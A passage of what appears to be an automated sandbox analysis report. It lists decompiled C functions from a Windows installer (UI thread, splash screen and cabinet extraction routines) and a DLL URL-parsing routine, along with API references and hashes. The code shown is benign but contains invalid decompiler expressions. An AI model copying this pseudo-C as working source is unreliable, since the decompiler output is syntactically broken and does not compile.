                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                                  • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 2700948981-3682088697
                                                                                                                                                                  • Opcode ID: d31839f4db480afc26cdf24a4051a66e8e4109e136620ff77ae6ea42b9d69ad2
                                                                                                                                                                  • Instruction ID: 93710acde06ff9ffe3ac996955c843d84e7064965b1b938c973326945c93e24f
                                                                                                                                                                  • Opcode Fuzzy Hash: d31839f4db480afc26cdf24a4051a66e8e4109e136620ff77ae6ea42b9d69ad2
                                                                                                                                                                  • Instruction Fuzzy Hash: ED31DC31F407266ADB21AAA59D46FBFB6B8DB48754F110137FA00F61D0DA789C014AED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                                                  			E0041787A(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                  				int _v8;
                                                                                                                                                                  				void* _v12;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				void _v24;
                                                                                                                                                                  				void* _t21;
                                                                                                                                                                  				void* _t24;
                                                                                                                                                                  				void* _t28;
                                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                                  				int _t45;
                                                                                                                                                                  
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_t45 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_t21 = CreateEventW(0, 1, 0, 0);
                                                                                                                                                                  				_v12 = _t21;
                                                                                                                                                                  				if(_t21 != 0) {
                                                                                                                                                                  					_t43 = _a8;
                                                                                                                                                                  					_v24 = _t21;
                                                                                                                                                                  					_v20 = _a4;
                                                                                                                                                                  					_v16 = _t43;
                                                                                                                                                                  					_t24 = CreateThread(0, 0, E004175BE,  &_v24, 0, 0);
                                                                                                                                                                  					_v8 = _t24;
                                                                                                                                                                  					if(_t24 != 0) {
                                                                                                                                                                  						WaitForMultipleObjects(2,  &_v12, 0, 0xffffffff);
                                                                                                                                                                  						 *((intOrPtr*)(_t43 + 0x3ac)) = _v8;
                                                                                                                                                                  						_t28 = 0;
                                                                                                                                                                  						_v8 = 0;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t48 =  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t45 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "uithread.cpp", 0x47, _t45);
                                                                                                                                                                  						_push("Failed to create the UI thread.");
                                                                                                                                                                  						goto L4;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t51 =  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t45 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "uithread.cpp", 0x3e, _t45);
                                                                                                                                                                  					_push("Failed to create initialization event.");
                                                                                                                                                                  					L4:
                                                                                                                                                                  					_push(_t45);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  					_t28 = _v8;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t28 != 0) {
                                                                                                                                                                  					CloseHandle(_t28);
                                                                                                                                                                  					_v8 = 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                  					CloseHandle(_v12);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t45;
                                                                                                                                                                  			}














                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00401EA4,?,?), ref: 0041789A
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004178A7
                                                                                                                                                                  • CreateThread.KERNEL32 ref: 004178F5
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417902
                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FF), ref: 00417948
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00417967
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00417974
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                  • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                                                                                                                  • API String ID: 2351989216-3599963359
                                                                                                                                                                  • Opcode ID: fd98d1b9d4451c8462368cd899169b825afd00b0aa59a0a7411517b82cc425b3
                                                                                                                                                                  • Instruction ID: 9ac4460ed46012822f6b7fe948cc426e85b9e290d1e74395d8818fd98736773c
                                                                                                                                                                  • Opcode Fuzzy Hash: fd98d1b9d4451c8462368cd899169b825afd00b0aa59a0a7411517b82cc425b3
                                                                                                                                                                  • Instruction Fuzzy Hash: BA315275E04215BFEB109FA98D84A9FBAF8EB08350F114166B905F3250D7349D018AE5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                                                  			E00417453(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                  				long _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                  				void _v32;
                                                                                                                                                                  				void* _t23;
                                                                                                                                                                  				void* _t29;
                                                                                                                                                                  				int _t31;
                                                                                                                                                                  				void* _t47;
                                                                                                                                                                  
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t23 = CreateEventW(0, 1, 0, 0);
                                                                                                                                                                  				_v16 = _t23;
                                                                                                                                                                  				if(_t23 != 0) {
                                                                                                                                                                  					_v32 = _t23;
                                                                                                                                                                  					_v28 = _a4;
                                                                                                                                                                  					_v24 = _a8;
                                                                                                                                                                  					_v20 = _a12;
                                                                                                                                                                  					_t29 = CreateThread(0, 0, E004171DA,  &_v32, 0,  &_v8);
                                                                                                                                                                  					_v12 = _t29;
                                                                                                                                                                  					if(_t29 != 0) {
                                                                                                                                                                  						_t31 = WaitForMultipleObjects(2,  &_v16, 0, 0xffffffff);
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t46 =  <=  ? GetLastError() : _t33 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t47 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t33 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "splashscreen.cpp", 0x4d, _t47);
                                                                                                                                                                  						_push("Failed to create UI thread.");
                                                                                                                                                                  						goto L4;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t50 =  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t47 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "splashscreen.cpp", 0x44, _t47);
                                                                                                                                                                  					_push("Failed to create modal event.");
                                                                                                                                                                  					L4:
                                                                                                                                                                  					_push(_t47);
                                                                                                                                                                  					_t31 = E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                  					_t31 = CloseHandle(_v12);
                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v16 != 0) {
                                                                                                                                                                  					return CloseHandle(_v16);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t31;
                                                                                                                                                                  			}















                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00401EA4,?,?), ref: 00417474
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00401EA4,?,?), ref: 00417481
                                                                                                                                                                  • CreateThread.KERNEL32 ref: 004174D8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00401EA4,?,?), ref: 004174E5
                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00401EA4,?,?), ref: 00417528
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00401EA4,?,?), ref: 0041753C
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00401EA4,?,?), ref: 00417549
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                  • String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
                                                                                                                                                                  • API String ID: 2351989216-1977201954
                                                                                                                                                                  • Opcode ID: 5a8e3259315ac60360532cdaafb0d41cbd600b92a9ac9cabfe9b18923f033d2e
                                                                                                                                                                  • Instruction ID: 52425e94ceacc81ac1de744fa91a9ef76b0a73159505ea0f13b269174744517f
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a8e3259315ac60360532cdaafb0d41cbd600b92a9ac9cabfe9b18923f033d2e
                                                                                                                                                                  • Instruction Fuzzy Hash: 72317375D00215BEEB109FA9DC05BEFBBF8EF44750F104127ED11F2250E7388A418AA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                                                  			E00423E70(intOrPtr _a4) {
                                                                                                                                                                  				long _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				long _t22;
                                                                                                                                                                  				intOrPtr _t52;
                                                                                                                                                                  
                                                                                                                                                                  				_t52 = _a4;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v16 =  *(_t52 + 0x28);
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v12 =  *(_t52 + 0x20);
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t22 = WaitForMultipleObjects(2,  &_v16, 0, 0xffffffff);
                                                                                                                                                                  				if(_t22 == 0) {
                                                                                                                                                                  					if(ResetEvent( *(_t52 + 0x28)) != 0) {
                                                                                                                                                                  						 *((intOrPtr*)(_t52 + 0x2c)) = 0;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t39 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t40 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "cabextract.cpp", 0x149, _t40);
                                                                                                                                                                  						_push("Failed to reset operation complete event.");
                                                                                                                                                                  						goto L3;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					if(_t22 == 1) {
                                                                                                                                                                  						if(GetExitCodeThread( *(_t52 + 0x20),  &_v8) == 0) {
                                                                                                                                                                  							_t45 =  <=  ? GetLastError() : _t31 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t46 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t31 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t31 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							E004300D9(0x80004005, "cabextract.cpp", 0x150, _t46);
                                                                                                                                                                  							_push("Failed to get extraction thread exit code.");
                                                                                                                                                                  							goto L3;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t49 =  <=  ? GetLastError() : _t34 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t50 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t34 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t34 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "cabextract.cpp", 0x156, _t50);
                                                                                                                                                                  						_push("Failed to wait for operation complete event.");
                                                                                                                                                                  						L3:
                                                                                                                                                                  						_push(_v8);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v8;
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,0040227F,00000000,000000FF,00000001,7519F5E0,0040227F,00000001,004021A7,00401DDF,00000000,00401E67,00401E27,?,00401E67,WixBundleElevated), ref: 00423E9B
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00423EAE
                                                                                                                                                                  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 00423EFA
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00423F08
                                                                                                                                                                  • ResetEvent.KERNEL32(?,?,?,00000000), ref: 00423F43
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00423F4D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                                                  • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                                                                                                                  • API String ID: 2979751695-3400260300
                                                                                                                                                                  • Opcode ID: 29f12b3261cb8a272b9ac3798d736ed00ad88194cac59c05bd7bd6e63a9c967e
                                                                                                                                                                  • Instruction ID: 7dd3a8fcb979c9927223fb3ff549ed4768c5b3eabb76901c8a89c0ea74aea91f
                                                                                                                                                                  • Opcode Fuzzy Hash: 29f12b3261cb8a272b9ac3798d736ed00ad88194cac59c05bd7bd6e63a9c967e
                                                                                                                                                                  • Instruction Fuzzy Hash: DA318471B00310AFEB18DF7AAD15B7EB6F4EF08711F10416FE946E61A0D7B9D9009A58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 59%
                                                                                                                                                                  			E00423F94(void* __ebx, intOrPtr _a4) {
                                                                                                                                                                  				signed short _t30;
                                                                                                                                                                  				signed short _t34;
                                                                                                                                                                  				void* _t37;
                                                                                                                                                                  				void* _t42;
                                                                                                                                                                  				intOrPtr _t49;
                                                                                                                                                                  
                                                                                                                                                                  				_t37 = __ebx;
                                                                                                                                                                  				_t49 = _a4;
                                                                                                                                                                  				_t42 = 0;
                                                                                                                                                                  				if( *(_t49 + 0x20) != 0) {
                                                                                                                                                                  					_t3 = _t49 + 0x24; // 0xc3e8
                                                                                                                                                                  					 *((intOrPtr*)(_t49 + 0x2c)) = 5;
                                                                                                                                                                  					if(SetEvent( *_t3) != 0) {
                                                                                                                                                                  						_t5 = _t49 + 0x20; // 0x26aa000
                                                                                                                                                                  						if(WaitForSingleObject( *_t5, 0xffffffff) != 0) {
                                                                                                                                                                  							_t30 = GetLastError();
                                                                                                                                                                  							_t45 =  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t42 =  >=  ? 0x80004005 :  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							E004300D9(0x80004005, "cabextract.cpp", 0x116, _t42);
                                                                                                                                                                  							_push("Failed to wait for thread to terminate.");
                                                                                                                                                                  							goto L5;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t34 = GetLastError();
                                                                                                                                                                  						_t48 =  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t42 =  >=  ? 0x80004005 :  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "cabextract.cpp", 0x110, _t42);
                                                                                                                                                                  						_push("Failed to set begin operation event.");
                                                                                                                                                                  						L5:
                                                                                                                                                                  						_push(_t42);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				_push(_t37);
                                                                                                                                                                  				if( *(_t49 + 0x20) != 0) {
                                                                                                                                                                  					_t7 = _t49 + 0x20; // 0x26aa000
                                                                                                                                                                  					CloseHandle( *_t7);
                                                                                                                                                                  					 *(_t49 + 0x20) =  *(_t49 + 0x20) & 0x00000000;
                                                                                                                                                                  				}
                                                                                                                                                                  				if( *(_t49 + 0x24) != 0) {
                                                                                                                                                                  					_t11 = _t49 + 0x24; // 0xc3e8
                                                                                                                                                                  					CloseHandle( *_t11);
                                                                                                                                                                  					 *(_t49 + 0x24) =  *(_t49 + 0x24) & 0x00000000;
                                                                                                                                                                  				}
                                                                                                                                                                  				if( *(_t49 + 0x28) != 0) {
                                                                                                                                                                  					_t15 = _t49 + 0x28; // 0xcc48300
                                                                                                                                                                  					CloseHandle( *_t15);
                                                                                                                                                                  					 *(_t49 + 0x28) =  *(_t49 + 0x28) & 0x00000000;
                                                                                                                                                                  				}
                                                                                                                                                                  				if( *((intOrPtr*)(_t49 + 0x4c)) != 0) {
                                                                                                                                                                  					_t19 = _t49 + 0x4c; // 0xc0bd8300
                                                                                                                                                                  					E00431137( *_t19);
                                                                                                                                                                  				}
                                                                                                                                                                  				if( *((intOrPtr*)(_t49 + 0x1c)) != 0) {
                                                                                                                                                                  					_t21 = _t49 + 0x1c; // 0x86850
                                                                                                                                                                  					E004380AB( *_t21);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t42;
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                  • SetEvent.KERNEL32(0000C3E8,00401F17,00000000,?,00418E8C,00401F17,00401DDF,00000000,?,0041175B,?,00401E9B,00401E9B,00000000,?,00401EAB), ref: 00423FB1
                                                                                                                                                                  • GetLastError.KERNEL32(?,00418E8C,00401F17,00401DDF,00000000,?,0041175B,?,00401E9B,00401E9B,00000000,?,00401EAB,00FFFFFD,00401EAB,?), ref: 00423FBB
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(026AA000,000000FF,?,00418E8C,00401F17,00401DDF,00000000,?,0041175B,?,00401E9B,00401E9B,00000000,?,00401EAB,00FFFFFD), ref: 00423FF5
                                                                                                                                                                  • GetLastError.KERNEL32(?,00418E8C,00401F17,00401DDF,00000000,?,0041175B,?,00401E9B,00401E9B,00000000,?,00401EAB,00FFFFFD,00401EAB,?), ref: 00423FFF
                                                                                                                                                                  • CloseHandle.KERNEL32(026AA000,00402077,00401F17,00000000,?,00418E8C,00401F17,00401DDF,00000000,?,0041175B,?,00401E9B,00401E9B,00000000,?), ref: 0042404A
                                                                                                                                                                  • CloseHandle.KERNEL32(0000C3E8,00402077,00401F17,00000000,?,00418E8C,00401F17,00401DDF,00000000,?,0041175B,?,00401E9B,00401E9B,00000000,?), ref: 00424059
                                                                                                                                                                  • CloseHandle.KERNEL32(0CC48300,00402077,00401F17,00000000,?,00418E8C,00401F17,00401DDF,00000000,?,0041175B,?,00401E9B,00401E9B,00000000,?), ref: 00424068
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
• Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
• Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
• Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
• Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$ErrorLast$EventObjectSingleWait
                                                                                                                                                                  • String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
                                                                                                                                                                  • API String ID: 1206859064-226982402
                                                                                                                                                                  • Opcode ID: c2ef122659c3f77878c76b58dfaedbd9290e5668f8d3a3b98ba76395c94414b7
                                                                                                                                                                  • Instruction ID: e325be36e0612aa1a1750bc1d43e979310d8036499d26b7013f321fa6cd8128c
                                                                                                                                                                  • Opcode Fuzzy Hash: c2ef122659c3f77878c76b58dfaedbd9290e5668f8d3a3b98ba76395c94414b7
                                                                                                                                                                  • Instruction Fuzzy Hash: 3921D3322007109BE7315B26EC09B57B6F1FF88755F11062EFA8A915A0D77DE440DA6C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E100212F0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				char* _v16;
                                                                                                                                                                  				char* _v20;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				char _v32;
                                                                                                                                                                  				char _v35;
                                                                                                                                                                  				char _v39;
                                                                                                                                                                  				char _v43;
                                                                                                                                                                  				char _v44;
                                                                                                                                                                  				void* _t86;
                                                                                                                                                                  				void* _t88;
                                                                                                                                                                  				intOrPtr _t91;
                                                                                                                                                                  				void* _t92;
                                                                                                                                                                  				void* _t120;
                                                                                                                                                                  				void* _t140;
                                                                                                                                                                  				void* _t141;
                                                                                                                                                                  				void* _t191;
                                                                                                                                                                  				void* _t192;
                                                                                                                                                                  				void* _t193;
                                                                                                                                                                  				void* _t194;
                                                                                                                                                                  				void* _t195;
                                                                                                                                                                  				void* _t196;
                                                                                                                                                                  
                                                                                                                                                                  				_t192 = __esi;
                                                                                                                                                                  				_t191 = __edi;
                                                                                                                                                                  				_t141 = __ebx;
                                                                                                                                                                  				_v32 = 0;
                                                                                                                                                                  				_v20 = "https://";
                                                                                                                                                                  				_v16 = "http://";
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				_v44 = 0;
                                                                                                                                                                  				_v43 = 0;
                                                                                                                                                                  				_v39 = 0;
                                                                                                                                                                  				_v35 = 0;
                                                                                                                                                                  				_t86 = E10001A50(_a4, _v20);
                                                                                                                                                                  				_t194 = _t193 + 8;
                                                                                                                                                                  				if(_t86 != 0) {
                                                                                                                                                                  					L2:
                                                                                                                                                                  					_v8 = _a4;
                                                                                                                                                                  					_t88 = E10001A50(_a4, _v20);
                                                                                                                                                                  					_t195 = _t194 + 8;
                                                                                                                                                                  					if(_t88 == 0) {
                                                                                                                                                                  						 *_a8 = 0;
                                                                                                                                                                  						_v8 = _v8 + 7;
                                                                                                                                                                  						 *_a20 = 0x50;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						 *_a8 = 1;
                                                                                                                                                                  						_v8 = _v8 + 8;
                                                                                                                                                                  						 *_a20 = 0x1bb;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t91 = E10001A50(_v8, "/");
                                                                                                                                                                  					_t196 = _t195 + 8;
                                                                                                                                                                  					_v28 = _t91;
                                                                                                                                                                  					if(_v28 == 0) {
                                                                                                                                                                  						_t92 = E1000CAD0(_v8);
                                                                                                                                                                  						_t196 = _t196 + 4;
                                                                                                                                                                  						_v24 = _t92 + 1;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_v24 = _v28 - _v8 + 1;
                                                                                                                                                                  					}
                                                                                                                                                                  					 *_a12 = L1000CEAF(_t141, _v24, _t191, _t192, _v24);
                                                                                                                                                                  					E1000CF80(_t191,  *_a12, 0, _v24);
                                                                                                                                                                  					E1000D1F0(_t141, _t191, _t192,  *_a12, _v8, _v24 - 1);
                                                                                                                                                                  					_v28 = E10001A50(_v8, "/");
                                                                                                                                                                  					if(_v28 == 0) {
                                                                                                                                                                  						_v24 = 2;
                                                                                                                                                                  						 *_a24 = L1000CEAF(_t141, _v24, _t191, _t192, _v24);
                                                                                                                                                                  						E1000CF80(_t191,  *_a24, 0, _v24);
                                                                                                                                                                  						E1000E2E0( *_a24, "/");
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_v24 = E1000CAD0(_v8) - _v28 - _v8 + 1;
                                                                                                                                                                  						 *_a24 = L1000CEAF(_t141, _v28 - _v8, _t191, _t192, _v24);
                                                                                                                                                                  						E1000CF80(_t191,  *_a24, 0, _v24);
                                                                                                                                                                  						E1000E2E0( *_a24, _v28);
                                                                                                                                                                  					}
                                                                                                                                                                  					_v8 = E10001A50( *_a12, ":");
                                                                                                                                                                  					if(_v8 == 0) {
                                                                                                                                                                  						_t181 = _a12;
                                                                                                                                                                  						_v24 = E1000CAD0( *_a12) + 1;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_v24 = _v8 -  *_a12 + 1;
                                                                                                                                                                  						_t120 = E1000CAD0( *_a12);
                                                                                                                                                                  						_t181 =  &_v44;
                                                                                                                                                                  						E1000D1F0(_t141, _t191, _t192,  &_v44, _v8 + 1, _t120 - _v24);
                                                                                                                                                                  						E1000E645( &_v44, "%d", _a20);
                                                                                                                                                                  					}
                                                                                                                                                                  					 *_a16 = L1000CEAF(_t141, _t181, _t191, _t192, _v24);
                                                                                                                                                                  					E1000CF80(_t191,  *_a16, 0, _v24);
                                                                                                                                                                  					E1000D1F0(_t141, _t191, _t192,  *_a16,  *_a12, _v24 - 1);
                                                                                                                                                                  					_v32 = 1;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t140 = E10001A50(_a4, _v16);
                                                                                                                                                                  					_t194 = _t194 + 8;
                                                                                                                                                                  					if(_t140 != 0) {
                                                                                                                                                                  						goto L2;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v32;
                                                                                                                                                                  			}




























                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
